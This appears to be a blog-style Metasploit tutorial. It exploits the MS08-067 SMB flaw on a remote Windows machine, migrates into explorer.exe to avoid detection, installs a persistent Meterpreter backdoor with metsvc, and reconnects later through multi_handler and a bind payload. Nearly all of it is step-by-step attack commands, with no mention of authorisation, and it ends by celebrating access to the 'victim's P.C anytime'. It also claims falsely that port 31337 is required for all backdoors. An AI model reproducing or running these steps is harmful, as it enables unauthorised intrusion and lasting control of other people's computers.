So, Let’s Start; You can either start the Metasploit framework from the Applications menu or from the command line. To launch Metasploit from the Applications menu go to Applications -> BackTrack -> ExploitationTools -> Network ExploitationTools -> msfconsole
Type in: msf > use exploit/windows/smb/ms08_067_netapi
First, we exploit the remote system.
And now we will give the “ps” command to see the Process List. As soon as we type this command, the Process List is displayed on the screen and we will now migrate to the 'Explorer.exe' by giving “migrate 1472” command in case the user notices the exploited service is not responding and decides to kill it.
Cool ! We have successfully migrated to “explorer.exe” . Now, It’s time for us to get into real business i.e- to install backdoor on the remote host. To install the backdoor we will type the following command:
> run metsvc
If all goes well, you will get the below image which shows that Meterpreter Backdoor has been successfully installed.
Now, let’s see the backdoor on the remote system. It is available in the folder named “BNUhuhnG” in the Temp directory of C:\WINDOWS.
After setting the backdoor successfully on the remote system , now I am going to restart remote PC.The reason behind the restarting is to check ,whether the backdoor i have installed will work or not. Now its time to access the Backdoor that we created in order to access the Remote PC again. We have to use the multi_handler with Payload . We will set the exploit first:-
After the exploit has been set, its now time to set the Payload.
set PAYLOAD windows/metsvc_bind_tcp
Now, we need to check all fields by giving the “show options” command.
Now, we need to specify the RHOST & LPORT in order to get access to the machine. We set RHOST to 192.168.2.9 and LPORT to 31337. The reason why I’m usin the 31337 port is because this port is used for all backdoor services. So, if you use different port, it will not create a meterpreter session when you exploit.
Now comes the Final step. You just have to exploit the target to get the meterpreter session again. So, we type the command: exploit
And here we go… The attack was executed successfully and so we got the meterpreter session again. Now, in Windows Task Manager , you can see the meterpreter-server.exe process is running on the victim’s /target host.
Great..! Now, we can access the victim’s P.C anytime we want to. And since the meterpreter session is open, you can do absolutely anything with the target host.